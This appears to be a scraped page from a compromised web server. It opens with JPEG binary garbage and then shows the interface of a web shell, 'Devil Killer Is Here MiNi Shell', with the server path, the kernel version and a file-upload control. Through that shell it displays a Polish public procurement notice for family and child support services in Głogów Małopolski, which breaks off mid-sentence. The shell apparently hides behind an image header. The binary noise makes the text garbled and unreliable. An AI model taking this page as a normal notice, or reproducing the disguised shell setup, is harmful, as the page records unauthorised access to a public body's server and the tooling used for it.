JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211104/0025773501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Kompleksowe usługi wsparcia rodzin i dzieci w projekcie <br/>„Aktywna rodzina mocno się trzyma” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejsko-Gminny Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790196563</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Fabryczna 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Głogów Małopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">glogowmlp@ops.net.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mgops.glogow-mlp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Kompleksowe usługi wsparcia rodzin i dzieci w projekcie <br/>„Aktywna rodzina mocno się trzyma” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a1daad97-3d6f-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00257735</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00247822/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Punkt Konsultacyjny: Konsultacje i poradnictwo specjalistyczne dla rodzin</p> <p class="mb-0">1.3.2 Terapie dla rodzin</p> <p class="mb-0">1.3.3 Trening kompetencji społecznych dla dzieci młodzieży - usługi w PWD</p> <p class="mb-0">1.3.4 Zajęcia plenerowe dla dzieci i młodzieży - streetworking - usługi w PWD</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Aktywna rodzina mocno się trzyma” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a1daad97-3d6f-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania/Utworz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający informuje, że maksymalny rozmiar plików przesyłanych za pośrednictwem: <br/>- dedykowanych formularzy ePUAP: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB, <br/>- poczty elektronicznej na adres wskazany w pkt 5.2.1 wynosi 3,5 MB.<br/><br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA DOTYCZĄCA OCHRONY DANYCH OSOBOWYCH zawiera Rozdział XVIII SWZ Część I</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MGOPS.261.18.1.2.TP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zadanie 1 – Indywidualne konsultacje i poradnictwo specjalistyczne dla rodzin.<br/><br/>1)	Specjalistyczne usługi poradnictwa i konsultacji obejmują realizację 1035 godzin zegarowych usług na rzecz uczestników projektu zamieszkałych na terenie Gminy Głogów Małopolski. <br/>2)	Zamawiający skieruje do udziału w konsultacjach do 150 uczestników projektu tj. 60. rodzin. <br/>3)	Specjalistyczne wsparcie w punkcie konsultacyjnym będzie obejmować usługi <br/>w zakresie: <br/>(a) wsparcia psychologa dla dorosłych <br/>(b) wsparcia psychologa dziecięcego <br/>(c) wsparcia logopedy<br/>(d) wsparcia pedagogicznego.<br/>Celem działalności Punktu Konsultacyjnego będzie wstępne zdiagnozowanie problemów rodzin oraz zaplanowanie wsparcia dla osób i rodzin korzystających z jego usług. Specjaliści będą służyć bezpłatną pomocą w bezpiecznych warunkach potrzebnych do dzielenia się problemami i doświadczeniami osób potrzebujących wsparcia. Specjaliści udzielą fachowych porad, zmotywują do podjęcia działań mających na celu poprawę sytuacji życiowej korzystających ze wsparcia rodzin.<br/>4)	Szacunkowa kalkulacyjna liczba godzin usług wsparcia wynosi a) wsparcie psychologa dla dorosłych – 184 godzin (b) wsparcie psychologa dziecięcego - 207 godzin (c) wsparcie logopedy - 276 godzin (d) wsparcie pedagogiczne – 368 godzin.<br/>2.	Zadanie 2 – Terapia grupowa dla rodzin.<br/><br/>1)	Specjalistyczne wsparcie grupowe w zakresie terapii rodzin obejmuje realizację 1265 godzin zegarowych usług na rzecz uczestników projektu zamieszkałych na terenie Gminy Głogów Małopolski. <br/>2)	Zamawiający skieruje do udziału w zajęciach do 150 beneficjentów tj. 60 rodzin. <br/> <br/>3)	Zadanie ma charakter zajęć grupowych i realizowane będzie w grupach obejmujących max do 20 osób w tym zarówno dorosłych członków rodzin, młodzieży i dzieci. <br/>4)	Specjalistyczne usługi terapii grupowej obejmować będą w szczególności usługi <br/>(a)	terapeuty zajęciowego<br/>(b) terapeuty rodzinnego<br/>(c) mediatora <br/>(d) psychoprofilaktyka <br/>Szacunkowa kalkulacyjna liczba godzin usług wsparcia wynosi dla poszczególnych zajęć: (a) terapeuty zajęciowego - 368 godzin, (b) terapeuty rodzinnego - 207 godzin, (c) mediatora - 207 godzin, (d) psychoprofilaktyka. – 480 godzin. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85310000-5 - Usługi pracy społecznej</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">52</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">48</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 – Trening kompetencji społecznych z elementami socjoterapii<br/><br/>1)	Specjalistyczne warsztaty w zakresie treningu kompetencji społecznych z elementami socjoterapii obejmują realizację 736 godzin zegarowych usług na rzecz uczestników projektu zamieszkałych na terenie Gminy Głogów Małopolski. <br/>2)	Zamawiający skieruje do udziału w zajęciach do 75 dzieci. <br/>3)	Zadanie ma charakter zajęć grupowych i realizowane będzie w grupach obejmujących do 15 dzieci w wieku od 6 lat do 15 lat. <br/>4)	Tematyka zajęć w formie warsztatowej obejmie między innymi: zagadnienia w obszarze rozwoju umiejętności społecznych. Regularne spotkania będą miały na celu integrację grupy oraz korekturę zaburzeń zachowania jak też zapoznanie uczestników zajęć <br/>z umiejętnościami społecznymi co oznacza posiadanie wiedzy na temat tego co, jak <br/>i kiedy należy zrobić, aby osiągnąć zmierzony cel interpersonalny oraz rozumienie tego dlaczego coś działa lub nie w relacjach między ludzkich. Tematyka warsztatów zostanie dostosowana do potrzeb i możliwości każdej z grup. Zajęcia poświęcone tematyce rozwijania kompetencji społecznych z elementami socjoterapii poprzedzone zostaną cyklem kilku spotkań z zakresu analizy własnych słabych i mocnych stron, predyspozycji i preferencji, gdzie uczestnicy za pomocą ćwiczeń i technik zwiększą swoją samoświadomość. Rozwijanie podczas zajęć kompetencji społecznych pozwoli uczestnikom na zwiększenie kompetencji interpersonalnych jak i intrapsychicznych. Program zajęć przewiduje także zagadnienia dotyczące rozwijania kompetencji liderskich, tak by kształtować wśród młodych postawę prospołeczną i proobywatelską, ukierunkowując na podejmowanie działań na rzecz innych. Podczas warsztatów uczestnicy poznają zasady, metody i techniki efektywnej komunikacji, asertywności, rozwiązywania konfliktów, negocjacji itp. przy jednoczesnym ćwiczeniu nabywanych kompetencji w bezpiecznych warsztatowych warunkach. W aktywny sposób przećwiczą techniki informacji zwrotnej. Zdobędą umiejętność komunikacji werbalnej <br/>i pozawerbalnej, która jest nieodłącznym elementem porozumiewania się z innymi ludźmi.<br/><br/>5)	Zamawiający jest zobowiązany do zamówienia łącznie 736 godzin zajęć z zakresu Kompetencji Społecznych z Elementami Socjoterapii.<br/><br/><br/>Zadanie nr 4 – Streetworking<br/><br/>1)	Specjalistyczne warsztaty w formie zajęć plenerowych - streetworkingu obejmują realizację 966 godzin zegarowych usług na rzecz uczestników projektu zamieszkałych na terenie Gminy Głogów Małopolski. <br/>2)	Zamawiający skieruje do udziału w zajęciach do 75 dzieci. <br/>3)	Zadanie ma charakter zajęć grupowych dostosowanych do indywidualnych preferencji dzieci z podziałem na grupy obejmujące od 3 do 15 dzieci w wieku od 6 do 15 lat.<br/>4)	Zajęcia plenerowe streetworking realizowane będą przez specjalistów z określonej dziedziny:<br/>(a)	Animator zabaw<br/><br/>(b)	Trener sztuki cyrkowej<br/><br/>(c)	Trener fitness<br/><br/>(d)	Instruktor tańca street dance<br/><br/>(e) Instruktor nauki pływania<br/><br/>(f) Fotograf<br/><br/>(g) Plastyk<br/><br/>(h) Trener śpiewu<br/><br/>(i) Instruktor gry na gitarze<br/>5)	Szacunkowa kalkulacyjna liczba godzin wsparcia specjalistów wynosi dla poszczególnych zajęć: (a) animator zabaw - 200 godzin, (b) trener sztuki cyrkowej - 120 godzin, (c) trener fitness - 120 godzin, (d) instruktor nauki pływania – 80 godzin, <br/>e) instruktor tańca street dance - 120 godzin, f) fotograf – 46 godzin, g) plastyk – 140 godzin, h) trener śpiewu – 60 godzin, i) instruktor gry na gitarze – 80 godzin </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85310000-5 - Usługi pracy społecznej</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie peronelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W zakresie zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa tego warunku udziału w Postępowaniu dla żadnej z części zamówienia.<br/><br/>2.	W zakresie uprawnień do prowadzenia określonej działalności gospodarczej:<br/>Zamawiający nie określa tego warunku udziału w Postępowaniu dla żadnej z części zamówienia.<br/><br/>3.	W zakresie sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie ustanawia żadnych wymagań w odniesieniu do niniejszego warunku. <br/>4.	W zakresie zdolności technicznej lub zawodowej dotyczącej doświadczenia wykonawcy:<br/>Część 1:<br/>W celu potwierdzenia spełniania tego warunku Wykonawca wykaże, że w okresie ostatnich (3) trzech lat przed upływem terminu składania ofert w Postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane - usługi w zakresie poradnictwa i/lub terapii w wymiarze co najmniej po 100 godzin zegarowych/dydaktycznych w 8 zakresach niżej wymienionych, tj. zrealizował łącznie co najmniej 800 godzin:<br/>Indywidualne konsultacje i poradnictwo:<br/>1) usługi wsparcia / terapii psychologicznej dla dorosłych,<br/>2) usługi wsparcia / terapii psychologicznej dla dzieci,<br/>3) usługi wsparcia logopedy<br/>4) usługi wsparcia pedagogicznego <br/>Terapia grupowa dla rodzin<br/>5) usługi terapii zajęciowej<br/>6) usługi poradnictwa i/lub terapii terapeuty rodzinnego,<br/>7) usługi mediacji rodzinnej,<br/>8) usługi poradnictwa i/lub terapii psychoprofilaktyka, <br/>które to usługi skierowane były do „osób, lub rodzin zagrożonych ubóstwem lub wykluczeniem społecznym”.<br/><br/><br/>Część 2:<br/>W celu potwierdzenia spełniania tego warunku Wykonawca wykaże, że w okresie ostatnich (3) trzech lat przed upływem terminu składania ofert w Postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługi w przypadku świadczeń powtarzających się lub ciągłych są wykonywane -usługi w wymiarze co najmniej po 400 godzin zegarowych/dydaktycznych spośród 2 niżej wymienionych zakresów, tj. zrealizował łącznie co najmniej 800 godzin:<br/>1) Trening kompetencji społecznych z elementami socjoterapii<br/>2) Usługi w zakresie streetworkingu,<br/>które to usługi skierowane były do dzieci i młodzieży.<br/><br/>UWAGA:<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach dotyczących doświadczenia tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie o którym mowa w art. 117 ust. 4 Ustawy Pzp, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek zostanie uznany za spełniony łącznie przez wszystkich Wykonawców.<br/><br/>5.	W zakresie zdolności technicznej lub zawodowej dotyczącej posiadania personelu zapewniającego zdolność do realizacji zamówienia:<br/>5.1.	Część 1:<br/>W celu potwierdzenia spełniania tego warunku Wykonawca wykaże, że posiada odpowiedni zespół zapewniający zdolność do realizacji zamówienia, tj. w skład zespołu skierowanego do realizacji zamówienia będzie wchodzić co najmniej 8 osób prowadzących formy wsparcia objęte przedmiotem zamówienia, posiadające minimum 2-letnie doświadczenie (każda) w pracy z „osobami lub rodzinami zagrożonymi ubóstwem lub wykluczeniem społecznym” w zakresie: <br/>a) usług psychologa dla dorosłych - punkt konsultacyjny (co najmniej 1 osoba legitymująca się wykształceniem wyższym na kierunku psychologia),<br/>b) usług psychologa dziecięcego - punkt konsultacyjny (co najmniej 1 osoba legitymująca się wykształceniem wyższym na kierunku psychologia, posiadająca przygotowanie pedagogiczne lub doświadczenie w pracy z dziećmi i młodzieżą),<br/>c) usług logopedy - punkt konsultacyjny (co najmniej 1 osoba legitymująca się wyksztalceniem wyższym na kierunku Pedagogika specjalna ze specjalnością logopedyczną, lub Studia na kierunku Logopedia ogólna i kliniczna lub Studia na kierunku Logopedia z audiologią lub studia magisterskie pedagogiczne lub osoba z ukończonym dowolnym kierunkiem i posiadająca przygotowanie pedagogiczne oraz studia podyplomowe w zakresie logopedii),<br/>d) usług pedagoga - punkt konsultacyjny (co najmniej 1 osoba legitymująca się wyksztalceniem wyższym o profilu pedagogicznym lub psychoprofilaktycznym wraz ze studiami podyplomowymi z zakresu pedagogiki), <br/>e) usług terapeuty zajęciowego (co najmniej 1 osoba legitymująca się wykształceniem średnim medycznym w zawodzie terapeuty zajęciowego lub osoba, która ukończyła studia wyższe na kierunku lub specjalizacji terapia zajęciowa),<br/>f) usług terapeuty rodzinnego (co najmniej 1 osoba legitymująca się wykształceniem wyższym psychologicznym oraz posiadająca kierunkowe szkolenia związane z terapią rodzinną),<br/>g) usług mediatora (co najmniej 1 osoba preferowana z wyksztalceniem wyższym na kierunku psychologia, prawo, socjologia lub ukończyła studia podyplomowe z mediacji i negocjacji lub ukończonym szkoleniem w zakresie mediacji).<br/>h) usług psychoprofilaktyka (co najmniej 1 osoba legitymująca się wyksztalceniem wyższym na kierunku psychoprofilaktyka społeczna lub osoba która ukończyła studia wyższe na kierunku pedagogika o specjalności 